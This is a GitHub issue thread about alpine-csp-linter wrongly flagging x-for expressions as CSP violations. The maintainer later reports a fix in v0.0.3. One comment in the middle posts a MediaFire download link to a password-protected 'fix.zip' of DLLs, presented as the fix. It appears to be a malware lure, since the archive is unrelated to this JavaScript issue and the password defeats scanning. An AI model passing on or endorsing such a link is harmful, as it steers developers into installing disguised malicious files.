### ISSUE TITLE
x-for is included in validation

### ISSUE THREAD

**Issue by mnik01** [mnik01/alpine-csp-linter#2]
### Describe the bug

<img width="565" alt="image" src="https://github.com/user-attachments/assets/5445d3ce-6b27-4bea-a7d1-91f8f8e25e9e">

Seems like expressions x-for does not trigger CSP violation and since that should be removed from showing errors

### Reproduction

-

### System Info

```Shell
-
```

### Used Package Manager

n/a

### Validations

- [X] Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
- [X] The provided reproduction is a [minimal reproducible](https://stackoverflow.com/help/minimal-reproducible-example) of the bug.

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
I put the necessary dlls in the archive

**Comment by mnik01** [comment]
Fixed in https://github.com/mnik01/alpine-csp-linter/commit/fb632329a4d5df2dc64440d9d1b8f44ad35cb48e
Released in v0.0.3
